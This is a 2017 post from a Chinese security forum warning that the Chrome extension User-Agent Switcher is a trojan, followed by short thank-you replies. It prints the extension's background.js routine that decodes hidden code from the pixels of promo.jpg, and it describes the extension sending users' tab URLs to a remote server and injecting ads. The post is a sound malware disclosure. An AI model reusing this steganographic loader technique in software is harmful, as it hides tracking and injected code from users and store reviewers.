[注意] Chrome 的插件 User-Agent Switcher 是个木马-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[注意] Chrome 的插件 User-Agent Switcher 是个木马

发表于: 2017-9-10 09:26 4461

[注意] Chrome 的插件 User-Agent Switcher 是个木马

Editor

活跃值

2017-9-10 09:26

4461

本文出处：35bK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2$3x3X3g2^5i4K6u0W2j5$3!0E0i4K6u0r3N6q4)9J5c8U0x3^5z5e0x3@1x3q4)9K6c8X3k6J5L8$3#2Q4x3@1c8@1K9h3#2W2L8r3W2F1k6g2)9J5y4X3q4E0M7q4)9K6b7X3W2K6j5i4m8H3K9h3&6K6N6r3q4D9L8r3g2V1i4K6y4p5x3l9`.`.

chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

b84K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0K9s2u0G2L8h3g2Q4x3X3g2Y4L8$3!0Y4L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6%4k6h3u0K6N6r3!0J5k6g2)9J5c8X3c8W2N6r3q4A6L8q4)9J5c8Y4g2K6k6i4u0Q4x3X3c8S2k6$3g2F1N6q4)9J5k6s2y4%4K9i4c8U0K9r3g2J5i4K6u0V1k6X3!0J5i4K6u0V1k6#2)9J5c8X3k6X3K9r3E0C8M7r3&6H3M7r3N6F1k6X3q4G2j5X3N6A6K9s2m8V1j5X3I4F1K9r3#2E0j5X3!0V1j5h3E0W2

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里

background.js 的第 80 行,从这个图片里解密出恶意代码并执行


t.prototype.Vh = function(t, e) {
            if ("" === '../promo.jpg') return"";
            void0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");
            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return"";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];
            if (c.data.every(function(t) {
                    return0 === t
                })) return"";
            var m, s;
            if (1 === o)
                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;
            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }

会把你打开的每个 tab 的 url 等信息加密发送到 af7K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6#2j5i4y4%4K9i4c8U0K9r3g2J5i4K6u0W2L8%4u0Y4i4K6u0r3L8r3!0Y4K9h3y4Q4x3V1k6H3j5h3N6W2i4K6u0r3k6r3q4@1j5b7`.`.

另外还会从 51cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4H3K9g2)9J5k6h3c8S2N6r3q4Q4x3X3c8E0L8$3&6A6N6r3!0J5i4K6u0W2K9h3&6X3L8#2)9J5c8X3q4H3K9g2)9J5c8X3u0Z5M7Y4g2D9k6g2)9K6c8Y4y4#2j5W2)9K6c8o6p5I4y4R3`.`. 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.

根据 threatbook 上的信息( cd5K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6^5i4K6u0W2N6r3S2J5k6h3q4@1j5X3!0G2K9#2)9J5k6h3y4F1i4K6u0r3k6r3!0E0j5h3W2F1i4K6u0r3j5i4m8A6i4K6u0W2k6r3q4@1j5g2)9J5k6r3#2G2L8X3W2@1L8%4u0Q4x3X3g2A6L8X3k6G2 ),我估计下面的几个插件都是这个作者的作品..

143K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0K9s2u0G2L8h3g2Q4x3X3g2Y4L8$3!0Y4L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6%4k6h3u0K6N6r3!0J5k6g2)9J5c8X3c8W2N6r3q4A6L8q4)9J5c8X3&6W2L8X3S2S2L8X3y4W2M7W2)9J5c8X3W2B7j5h3&6G2K9r3g2U0j5X3y4H3k6r3N6F1M7r3W2S2j5X3c8X3k6h3S2X3K9X3N6U0j5i4m8W2M7r3u0E0

205K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0K9s2u0G2L8h3g2Q4x3X3g2Y4L8$3!0Y4L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6%4k6h3u0K6N6r3!0J5k6g2)9J5c8X3c8W2N6r3q4A6L8q4)9J5c8X3q4D9L8r3!0%4i4K6u0V1j5$3!0H3P5g2)9J5c8X3q4T1K9h3c8F1k6r3A6F1L8$3c8S2K9$3g2S2K9h3y4G2k6r3k6H3k6$3y4F1L8r3E0H3M7s2m8S2M7r3q4Z5

90eK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0K9s2u0G2L8h3g2Q4x3X3g2Y4L8$3!0Y4L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6%4k6h3u0K6N6r3!0J5k6g2)9J5c8X3c8W2N6r3q4A6L8q4)9J5c8W2)9J5y4f1b7I4i4K6t1#2z5o6q4Q4x3U0g2p5x3q4)9J5y4f1u0m8i4K6t1#2c8o6m8Q4x3U0g2n7x3q4)9J5y4f1b7I4i4K6t1#2z5o6N6Q4x3U0g2p5x3q4)9J5y4f1t1H3i4K6t1#2c8o6q4Q4x3U0f1^5x3W2)9J5y4f1b7I4i4K6t1#2z5p5y4Q4x3X3c8Q4x3U0g2p5x3q4)9J5y4f1u0o6i4K6t1#2c8o6q4Q4x3U0f1^5x3#2)9J5y4f1b7H3i4K6t1#2b7U0N6Q4x3U0g2p5x3g2)9J5y4e0S2n7i4K6t1#2c8o6m8Q4x3U0g2n7b7g2)9J5y4f1b7I4i4K6t1#2z5o6y4Q4x3X3c8Q4x3U0g2p5x3q4)9J5y4f1t1J5i4K6t1#2c8o6m8Q4x3U0g2n7b7g2)9J5y4f1b7H3i4K6t1#2b7V1g2Q4x3U0g2p5x3q4)9J5y4f1u0p5i4K6t1#2c8o6q4Q4x3U0f1^5x3W2)9J5y4f1b7H3i4K6t1#2b7U0m8Q4x3U0g2p5x3q4)9J5y4f1u0m8i4K6t1#2c8o6q4Q4x3U0f1^5x3W2)9J5y4f1b7H3i4K6t1#2b7U0g2Q4x3V1k6Z5j5h3&6B7K9h3q4B7k6$3&6G2L8X3q4G2j5X3c8D9K9$3I4F1j5$3c8B7k6r3#2H3j5X3!0E0L8r3S2G2j5b7`.`.

b69K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0K9s2u0G2L8h3g2Q4x3X3g2Y4L8$3!0Y4L8r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6%4k6h3u0K6N6r3!0J5k6g2)9J5c8X3c8W2N6r3q4A6L8q4)9J5c8X3q4D9K9h3g2^5M7s2u0W2M7%4y4Q4x3X3c8J5j5h3c8S2M7W2)9J5c8Y4m8X3K9X3W2T1K9$3E0D9k6%4m8X3j5$3k6V1L8r3S2A6K9X3k6Y4L8r3q4E0k6r3&6C8K9X3&6H3k6r3g2Y4

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・4

免费・0

支持

分享

最新回复 (4)
youxiaxy 雪币： 2049 活跃值： (2082) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 226 粉丝 4 关注私信	youxiaxy 2 楼 3Q 2017-9-10 09:42 0
wx_陈佳林雪币： 3 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	wx_陈佳林 3 楼 3Q！幸亏我用的火狐！ 2017-9-10 10:23 0
青眼白龙雪币： 5137 活跃值： (5900) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 152 粉丝 1 关注私信	青眼白龙 4 楼 3Q！我正好有这个插件，虽然基本没用过，不过还是赶紧换了 2017-9-10 19:42 0
petersonhz 雪币： 2375 活跃值： (433) 能力值： ( LV2，RANK：10 ) 在线值：发帖 422 回帖 2433 粉丝 1 关注私信	petersonhz 5 楼青眼白龙 3Q！我正好有这个插件，虽然基本没用过，不过还是赶紧换了如何发现这种木马呢？ 2019-6-3 11:21 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

返回

Editor

发帖

回帖

RANK

他的文章

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区